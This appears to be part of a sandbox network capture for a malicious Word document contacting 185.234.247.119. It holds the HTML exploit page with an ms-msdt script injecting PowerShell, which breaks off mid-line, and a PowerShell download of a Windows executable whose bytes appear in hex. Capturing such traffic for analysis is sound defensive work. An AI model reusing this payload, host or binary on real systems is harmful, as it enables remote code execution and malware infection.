                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                      Jun 7, 2022 18:44:08.296071053 CEST1215OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.324341059 CEST1216INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.449758185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jun 7, 2022 18:44:07.498353004 CEST1206OUTGET /123.RES HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:07.525994062 CEST1208INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:07 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65
                                                                                                                                                                      Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
                                                                                                                                                                      Jun 7, 2022 18:44:07.526021004 CEST1209INData Raw: 73 71 75 65 20 71 75 69 73 20 70 72 65 74 69 75 6d 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 66 61 63 69 6c 69 73 69 73 20 75 6c 74 72 69 63 69 65 73 20 6d 61 73 73 61 20 61 63 20 63 6f 6d 6d 6f 64 6f 2e 20 4e 61 6d 20 6e 65 63 20 63 6f 6e
                                                                                                                                                                      Data Ascii: sque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas sceleri
                                                                                                                                                                      Jun 7, 2022 18:44:07.526053905 CEST1210INData Raw: 65 72 64 75 6d 2c 20 6e 69 73 6c 20 65 75 20 6c 61 6f 72 65 65 74 20 74 65 6d 70 75 73 2c 20 61 75 67 75 65 20 6e 69 73 6c 20 76 6f 6c 75 74 70 61 74 20 6f 64 69 6f 2c 20 64 69 63 74 75 6d 20 61 6c 69 71 75 61 6d 20 6d 61 73 73 61 20 6f 72 63 69
                                                                                                                                                                      Data Ascii: erdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condime
                                                                                                                                                                      Jun 7, 2022 18:44:07.526104927 CEST1212INData Raw: 61 6d 65 74 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 69 6e 20 6c 65 63 74 75 73 20 65 72 61 74 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 56 69 76 61 6d 75 73 20 73 65 64 20 6d 61 73 73 61 20 71 75 69 73 20 61 72 63 75 20 65 67
                                                                                                                                                                      Data Ascii: amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi convallis fringilla
                                                                                                                                                                      Jun 7, 2022 18:44:07.526155949 CEST1213INData Raw: 2c 20 6a 75 73 74 6f 20 61 63 20 70 6f 72 74 61 20 66 61 63 69 6c 69 73 69 73 2c 20 6d 69 20 73 61 70 69 65 6e 20 65 66 66 69 63 69 74 75 72 20 69 70 73 75 6d 2c 20 73 69 74 20 66 75 73 63 65 2e 0d 0a 3c 2f 70 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d
                                                                                                                                                                      Data Ascii: , justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.</p><script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invo
                                                                                                                                                                      Jun 7, 2022 18:44:07.803332090 CEST1213OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:07.831824064 CEST1214INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:07 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:08.025104046 CEST1214OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:08.052786112 CEST1214INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:08.363728046 CEST1216OUTGET /123.RES HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      If-None-Match: "6299dd5d-1861"
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:08.391499996 CEST1216INHTTP/1.1 304 Not Modified
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Jun 7, 2022 18:44:08.493047953 CEST1217OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:08.520741940 CEST1217INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:08 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:09.212635040 CEST1224OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:09.240037918 CEST1322INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:09 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Jun 7, 2022 18:44:14.023246050 CEST1416OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:44:14.050962925 CEST1417INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:44:14 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 6241
                                                                                                                                                                      Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "6299dd5d-1861"
                                                                                                                                                                      Accept-Ranges: bytes


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.449781185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jun 7, 2022 18:45:11.398526907 CEST4705OUTGET /1676044147.dat HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: 185.234.247.119
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jun 7, 2022 18:45:11.563088894 CEST4707INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 07 Jun 2022 16:45:11 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 1437696
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Expires: 0
                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                      Content-Disposition: attachment;
                                                                                                                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54
                                                                                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B* @Pp%HlSCODE `DATA' (@BSSqP..idata%p&.@.reloclSTT@P.rsrcHH@PP@P@Boolean@FalseT
                                                                                                                                                                      Jun 7, 2022 18:45:11.563114882 CEST4708INData Raw: 72 75 65 8d 40 00 2c 10 40 00 09 08 57 69 64 65 43 68 61 72 03 00 00 00 00 ff ff 00 00 90 44 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 58 10 40 00 01 08 53 68 6f 72 74 69 6e 74 00 80 ff ff ff 7f 00 00 00 90 70 10 40 00 01 08 53 6d
                                                                                                                                                                      Data Ascii: rue@,@WideCharD@CharX@Shortintp@Smallint@Integer@Byte@Word@Extended@Cardinal@Int64@Single
                                                                                                                                                                      Jun 7, 2022 18:45:11.563146114 CEST4710INData Raw: ff 25 e0 71 51 00 8b c0 ff 25 dc 71 51 00 8b c0 ff 25 00 72 51 00 8b c0 ff 25 d8 71 51 00 8b c0 ff 25 fc 71 51 00 8b c0 ff 25 d4 71 51 00 8b c0 ff 25 d0 71 51 00 8b c0 ff 25 cc 71 51 00 8b c0 ff 25 c8 71 51 00 8b c0 ff 25 c4 71 51 00 8b c0 ff 25
                                                                                                                                                                      Data Ascii: %qQ%qQ%rQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%qQ%rQ%rQ%rQ%qQ%qQ% rQ%rQ%rQ%qQ%qQ%
                                                                                                                                                                      Jun 7, 2022 18:45:11.563169003 CEST4711INData Raw: c6 ff 0f 00 00 81 e6 00 f0 ff ff 89 34 24 8b eb 03 ea 81 e5 00 f0 ff ff 8b 04 24 89 01 8b c5 2b 04 24 89 41 04 8b 35 ec 55 51 00 eb 38 8b 5e 08 8b 7e 0c 03 fb 3b 1c 24 73 03 8b 1c 24 3b ef 73 02 8b fd 3b fb 76 1c 68 00 40 00 00 2b fb 57 53 e8 ad
                                                                                                                                                                      Data Ascii: 4$$+$A5UQ8^~;$s$;s;vh@+WSuUQ6UQuZ]_^[@SVWUUQ?]3;{,C>tPFCF)C{u>5;u>t!<$uV
                                                                                                                                                                      Jun 7, 2022 18:45:11.563191891 CEST4712INData Raw: e8 f3 05 00 00 c3 8b c0 83 fa 0c 7c 0e 83 ca 02 89 10 83 c0 04 e8 ca ff ff ff c3 83 fa 04 7c 0a 8b ca 81 c9 02 00 00 80 89 08 03 c2 83 20 fe c3 53 56 8b d0 83 ea 04 8b 12 8b ca 81 e1 02 00 00 80 81 f9 02 00 00 80 74 0a c7 05 c8 55 51 00 04 00 00
                                                                                                                                                                      Data Ascii: || SVtUQ+3tUQt r+;ptUQ^[@SVW3t%uXF#_^[SVWU$
                                                                                                                                                                      Jun 7, 2022 18:45:11.563210011 CEST4714INData Raw: 4d f8 89 08 8b c6 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 b4 55 51 00 83 eb 04 01 1d b8 55 51 00 e8 92 18 00 00 e9 84 00 00 00 3b 1d 1c 56 51 00 7f 4a 29 1d 1c 56 51 00 83 3d 1c 56 51 00 0c 7d 0d 03 1d 1c 56 51 00 33 c0 a3 1c 56 51 00 a1
                                                                                                                                                                      Data Ascii: MREUQUQ;VQJ)VQ=VQ}VQ3VQ VQ VQEUQUQ=2E3ZYYdh%@=MPQthUQcE_^[YY]@UQSVW3UQ=UQufuUQEa
                                                                                                                                                                      Jun 7, 2022 18:45:11.563225031 CEST4714INData Raw: eb 02 33 db 8b c3 5b c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 44 20 51 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 40 20 51 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c 20 51 00 59 09 c0 74 e7
                                                                                                                                                                      Data Ascii: 3[t2tPD QYt@ QutP< QYt@@tq@@3_@tQ@@3SV=@t
                                                                                                                                                                      Jun 7, 2022 18:45:11.563241005 CEST4715INData Raw: 2f 40 00 00 8b b0 00 00 00 00 8b 5e 08 e8 21 40 00 00 33 c0 89 46 08 eb 02 33 db 8b c3 5e 5b c3 8d 40 00 89 15 04 20 51 00 e8 4d 18 00 00 c3 53 56 8b f2 8b d8 80 e3 7f 83 3d 08 50 51 00 00 74 0a 8b d6 8b c3 ff 15 08 50 51 00 84 db 75 0d e8 df 3f
                                                                                                                                                                      Data Ascii: /@^!@3F3^[@ QMSV=PQtPQu?w3H Q3^[$PRQ?YZXu1@S?[VW|$1t+~9)@|9G1_
                                                                                                                                                                      Jun 7, 2022 18:45:11.563258886 CEST4717INData Raw: 8d 81 00 00 00 89 c2 83 e2 1f 8d 14 92 db ac 53 c7 30 40 00 de c9 c1 e8 05 74 79 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 fd 31 40 00 de c9 c1 e8 04 74 61 8d 04 80 db ac 43 93 32 40 00 de c9 eb 53 f7 d8 3d 00 14 00 00 7d 46 89 c2 83 e2 1f 8d 14 92
                                                                                                                                                                      Data Ascii: S0@tytS1@taC2@S=}FS0@t4tS1@tC2@0@[?@@@@@P@$@@
                                                                                                                                                                      Jun 7, 2022 18:45:11.590662003 CEST4718INData Raw: ff ff ff 00 01 c1 89 d0 8b 11 e9 80 2d 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 f8 35 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03
                                                                                                                                                                      Data Ascii: -@USVW3]U3Uh5@d0d 3Uct1Ct>>t!PPMSrU->3ZYYdh5@E,_^[YY]SVCt)2;0ur;pur;pur;ptIu[t1^[
                                                                                                                                                                      Jun 7, 2022 18:45:11.590702057 CEST4719INData Raw: 06 00 00 00 0f 85 6f 01 00 00 81 38 de fa ed 0e 74 1f fc e8 41 f9 ff ff 8b 15 0c 50 51 00 85 d2 0f 84 53 01 00 00 ff d2 85 c0 75 0a e9 48 01 00 00 8b 40 18 8b 00 8b 54 24 08 53 56 57 55 8b 4a 04 8b 59 05 8d 71 09 89 c5 8b 06 85 c0 74 43 89 ef eb
